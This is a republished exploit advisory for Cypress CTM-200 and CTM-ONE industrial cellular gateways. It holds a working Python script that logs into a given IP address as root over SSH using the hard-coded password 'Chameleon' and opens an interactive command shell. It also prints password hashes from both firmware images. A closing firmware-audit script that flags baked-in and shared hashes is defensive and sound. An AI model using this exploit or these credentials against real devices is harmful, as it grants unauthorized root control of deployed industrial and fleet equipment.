Cypress Solutions CTM-200/CTM-ONE Hard-Coded Credentials Remote Root

Date: 11 Oct 2021. Reported by: LiquidWorm. Type: packetstorm. Source: packetstormsecurity.com

The Cypress Solutions CTM-200 and CTM-ONE gateways contain hard-coded credentials in their Linux distribution image. These credentials allow unauthorized remote root access over Telnet/SSH.

Code
`#!/usr/bin/env python3  
#  
#  
# Cypress Solutions CTM-200/CTM-ONE Hard-coded Credentials Remote Root (Telnet/SSH)  
#  
#  
# Vendor: Cypress Solutions Inc.  
# Product web page: https://www.cypress.bc.ca  
# Affected version: CTM-ONE (1.3.6-latest)  
# CTM-ONE (1.3.1)  
# CTM-ONE (1.1.9)  
# CTM200 (2.7.1.5659-latest)  
# CTM200 (2.0.5.3356-184)  
#  
# Summary: CTM-200 is the industrial cellular wireless gateway for fixed  
# and mobile applications. The CTM-200 is a Linux based platform powered  
# by ARM Cortex-A8 800 MHz superscalar processor. Its on-board standard  
# features make the CTM-200 ideal for mobile fleet applications or fixed  
# site office and SCADA communications.  
#  
# CTM-ONE is the industrial LTE cellular wireless gateway for mobile and  
# fixed applications. CTM-ONE is your next generation of gateway for fleet  
# tracking and fixed sites.  
#  
# ======================================================================  
# CTM-200  
# /var/config/passwd:  
# -------------------  
# root:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash  
# admin:$1$5RS5yR6V$Lo9QCp3rB/7UCU8fRq5ec0:0:0:root:/root:/bin/ash  
# nobody:*:65534:65534:nobody:/var:/bin/false  
# daemon:*:65534:65534:daemon:/var:/bin/false  
#  
# /var/config/advanced.ini:  
# -------------------------  
# 0  
# 0  
# Chameleon  
# 0,0,0,0,0,255  
# 0,0,0,0,0,255  
# 0,0,0,0,0,255  
# 0,0,0,0,0,255  
# 0,0,0,0,0,255  
# 0,0,0,0,0,255  
#  
#  
# CTM-ONE  
# /etc/shadow:  
# ------------  
# admin:$6$l22Co5pX$.TzqtAF55KX2XkQrjENNkqQfRBRB2ai0ujayHE5Ese7SdcxkXf1EPQqDv3/d2u3D/OHlgngU8f9Pn5.gO61vx/:17689:0:99999:7:::  
# root:$6$5HHLZqFi$Gw4IfW2NBiwce/kMpc2JGM1byduuiJJy/Z7YhKQjSi4JSx8cur0FYhSDmg5iTXaehqu/d6ZtxNZtECZhLJrLC/:17689:0:99999:7:::  
# daemon:*:16009:0:99999:7:::  
# bin:*:16009:0:99999:7:::  
# sys:*:16009:0:99999:7:::  
# ftp:*:16009:0:99999:7:::  
# nobody:*:16009:0:99999:7:::  
# messagebus:!:16009:0:99999:7:::  
# ======================================================================  
#   
# Desc: The CTM-200 and CTM-ONE are vulnerable to hard-coded credentials  
# within their Linux distribution image. This weakness can lead to the  
# exposure of resources or functionality to unintended actors, providing  
# attackers with sensitive information including executing arbitrary code.  
#  
# Tested on: GNU/Linux 4.1.15-1.2.0+g77f6154 (arm7l)  
# GNU/Linux 2.6.32.25 (arm4tl)  
# lighttpd/1.4.39  
# BusyBox v1.24.1  
# BusyBox v1.15.3  
#  
#  
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic  
# @zeroscience  
#  
#  
# Advisory ID: ZSL-2021-5686  
# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5686.php  
#  
#  
# 21.09.2021  
#  
  
import sys  
import paramiko  
  
bnr='''  
o ┌─┐┌┬┐┌─┐ ┌─┐ ┬─┐┌─┐┌─┐┌┬┐┌─┐┬ ┬┌─┐┬ ┬ o  
│ │││││ ┬ ├─┤ ├┬┘│ ││ │ │ └─┐├─┤├┤ │ │  
o └─┘┴ ┴└─┘ ┴ ┴ ┴└─└─┘└─┘ ┴ └─┘┴ ┴└─┘┴─┘┴─┘ o  
'''  
print(bnr)  
  
if len(sys.argv)<2:  
    print('Put an IP.')  
    sys.exit()  
  
adrs=sys.argv[1]##  
unme='root'#admin#  
pwrd='Chameleon'##  
  
rsh=paramiko.SSHClient()  
rsh.set_missing_host_key_policy(paramiko.AutoAddPolicy())  
rsh.connect(adrs,username=unme,password=pwrd)  
  
while 1:  
    cmnd=input('# ')  
    if cmnd=='exit':  
        break  
    stdin,stdout,stderr=rsh.exec_command(cmnd)  
    stdin.close()  
    print(str(stdout.read().decode()))  
rsh.close()  
`
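
The account listings in the advisory header show what a firmware review should flag before an image ships: password hashes baked into the image, two UID 0 accounts sharing one hash, and MD5-crypt (`$1$`) hashing. The audit below is an added example, not part of the original advisory or exploit; the function names and the sample input (constructed to mirror the CTM-200 listing, with placeholder hashes) are assumptions.

```python
from collections import defaultdict

# crypt(3) scheme prefixes treated as weak for a shipped image.
WEAK_PREFIXES = {"$1$": "MD5-crypt"}

# Constructed sample mirroring the layout of the CTM-200 /var/config/passwd
# listing in the advisory header; hash values are placeholders, not real hashes.
SAMPLE_PASSWD = """\
root:$1$SALTSALT$PLACEHOLDERHASHAAAAAAA:0:0:root:/root:/bin/ash
admin:$1$SALTSALT$PLACEHOLDERHASHAAAAAAA:0:0:root:/root:/bin/ash
nobody:*:65534:65534:nobody:/var:/bin/false
daemon:*:65534:65534:daemon:/var:/bin/false
"""

def parse_accounts(text):
    """Parse passwd- or shadow-style lines into (name, password_field, uid)."""
    accounts = []
    for line in text.splitlines():
        fields = line.strip().split(":")
        if len(fields) < 2 or not fields[0] or fields[0].startswith("#"):
            continue
        # passwd has 7 fields with the UID third; shadow (9 fields) has no UID.
        uid = int(fields[2]) if len(fields) == 7 and fields[2].isdigit() else None
        accounts.append((fields[0], fields[1], uid))
    return accounts

def audit(text):
    """Return sorted findings for credentials baked into an image's account files."""
    findings, by_hash, uid0 = [], defaultdict(list), []
    for name, pw, uid in parse_accounts(text):
        if uid == 0:
            uid0.append(name)
        if pw in ("", "x") or pw[0] in "*!":
            continue  # no hash in this file: empty, shadowed ("x") or locked
        by_hash[pw].append(name)
        findings.append(f"{name}: static password hash in image")
        for prefix, scheme in WEAK_PREFIXES.items():
            if pw.startswith(prefix):
                findings.append(f"{name}: weak hash scheme {scheme}")
    for names in by_hash.values():
        if len(names) > 1:
            findings.append(f"shared password hash: {', '.join(sorted(names))}")
    if len(uid0) > 1:
        findings.append(f"multiple UID 0 accounts: {', '.join(sorted(uid0))}")
    return sorted(findings)

if __name__ == "__main__":
    print("\n".join(audit(SAMPLE_PASSWD)))
```

A shadow file with distinct SHA-512 hashes, as in the CTM-ONE listing, is still flagged per account, because any hash present in a shipped image is the same on every device built from it.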
